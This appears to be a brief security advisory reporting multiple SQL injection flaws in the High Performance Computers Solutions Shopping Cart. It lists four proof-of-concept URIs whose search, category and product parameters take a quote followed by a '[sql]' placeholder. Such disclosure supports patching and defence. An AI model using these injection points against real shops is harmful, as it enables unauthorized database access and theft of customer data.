High Performance Computers Solutions Shopping Cart Multiple SQL Injection Vulnerabilities

High Performance Computers Solutions Shopping Cart Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://example.com/search_list.asp?Hpecs_Find=maingroup&searchstring='[sql]
http://example.com/search.asp?search='[sql]
http://example.com/category.asp?catcode='[sql]
http://example.com/product.asp?productid='[sql]